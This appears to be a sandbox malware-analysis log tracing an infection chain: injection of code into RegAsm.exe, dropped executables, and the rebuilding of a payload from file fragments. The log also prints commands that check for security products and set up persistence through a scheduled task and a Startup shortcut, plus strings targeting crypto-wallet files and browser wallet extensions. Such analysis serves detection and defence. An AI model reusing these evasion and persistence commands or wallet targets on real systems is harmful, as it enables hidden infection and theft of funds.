                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28F5C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A28FC0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29024
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29088
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A290EC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29150
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A291B4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29218
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2927C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A292E0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29344
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A293A8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2940C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29470
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A294D4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29538
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2959C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29600
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29664
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A296C8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2972C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29790
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A297F4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29858
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A298BC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29920
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29984
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A299E8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29A4C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29AB0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29B14
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29B78
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29BDC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29C40
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29CA4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29D08
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29D6C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29DD0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29E34
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29E98
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29EFC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29F60
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A29FC4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A028
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A08C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A0F0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A154
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A1B8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A21C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A280
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A2E4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A348
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A3AC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A410
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A474
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A4D8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A53C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A5A0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A604
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A668
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A6CC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A730
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A794
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A7F8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A85C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A8C0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A924
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A988
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2A9EC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AA50
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AAB4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AB18
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AB7C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2ABE0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AC44
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2ACA8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2AD0C
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe "C:\Users\user~1\AppData\Local\Temp\10111840101\HmngBpR.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe "C:\Users\user~1\AppData\Local\Temp\10112790101\ADFoyxP.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe "C:\Users\user~1\AppData\Local\Temp\10114440101\9hUDDVk.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | Process created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe C:\Users\user~1\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Process created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\maintains.pub + ..\legislation.pub + ..\blood.pub + ..\document.pub + ..\breaks.pub + ..\both.pub + ..\explicitly.pub + ..\governor.pub + ..\bull.pub + ..\comparison.pub + ..\performing.pub + ..\gate.pub + ..\republican.pub + ..\reverse.pub + ..\thousand.pub + ..\apartments.pub + ..\swingers.pub + ..\urban.pub + ..\robert.pub + ..\regulation.pub + ..\confusion.pub + ..\listening.pub + ..\generating.pub + ..\argentina.pub + ..\amenities.pub + ..\vacation.pub + ..\vampire.pub + ..\trademarks.pub + ..\distinguished.pub + ..\silly.pub + ..\hell.pub + ..\worcester.pub + ..\concept.pub + ..\enlarge.pub + ..\preference.pub + ..\poem.pub m
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradesecure innovations\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exit
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA17EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00FA17EE
Source: Seat.com, 00000022.00000003.1626880641.0000000004B37000.00000004.00000800.00020000.00000000.sdmp, Seat.com, 00000022.00000000.1614278825.0000000000E73000.00000002.00000001.01000000.0000001E.sdmp, TradeHub.com, 0000002B.00000000.1645206040.0000000000EB3000.00000002.00000001.01000000.00000021.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 2R0700.exe, 00000005.00000002.1210638292.0000000000BB9000.00000040.00000001.01000000.0000000A.sdmp | Binary or memory string: ~](Program Manager
Source: 1E08u3.exe, 1E08u3.exe, 00000002.00000002.944674073.0000000000695000.00000040.00000001.01000000.00000005.sdmp | Binary or memory string: JProgram Manager
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: 17_2_009F2835 cpuid 17_2_009F2835
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: _Getdateorder,___lc_locale_name_func,__crtGetLocaleInfoEx,17_2_6D627770
Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | Code function: __crtGetLocaleInfoEx,GetLocaleInfoEx,?isfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAEXXZ,GetLocaleInfoEx,GetLocaleInfoW,17_2_6D60C160
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10115790101\T0QdO0l.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10119590141\ogfNbjS.ps1 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10122730101\bncn6rv.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\4e031b4c VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00FA7155
Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00FA2BFB
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 2R0700.exe, 00000005.00000003.1127738528.000000000070A000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1127856691.000000000069D000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1128700937.000000000070A000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1127663273.0000000005471000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1127856691.0000000000679000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: pwHxMTy.exe, 0000002E.00000002.2023408914.0000000001237000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: amFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.987084215.0000000000711000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.982319426.0000000000711000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.946478690.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.904297823.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.1269297866.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.941650919.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exe, type: DROPPED
Source: Yara match | File source: Process Memory Space: 2R0700.exe PID: 5204, type: MEMORYSTR
Source: Yara match | File source: 46.2.pwHxMTy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 46.2.pwHxMTy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 45.2.pwHxMTy.exe.4209550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.2R0700.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000002E.00000002.2016617729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: dump.pcap, type: PCAP
Source: 2R0700.exe | String found in binary or memory: Wallets/Electrum-LTC
Source: 2R0700.exe | String found in binary or memory: %appdata%\ElectronCash\wallets
Source: 2R0700.exe | String found in binary or memory: Jaxx Liberty
Source: 2R0700.exe | String found in binary or memory: window-state.json
Source: 2R0700.exe | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 2R0700.exe | String found in binary or memory: ExodusWeb3
Source: 2R0700.exe | String found in binary or memory: %appdata%\Ethereum
Source: 2R0700.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 2R0700.exe, 00000005.00000003.1097981161.000000000068E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
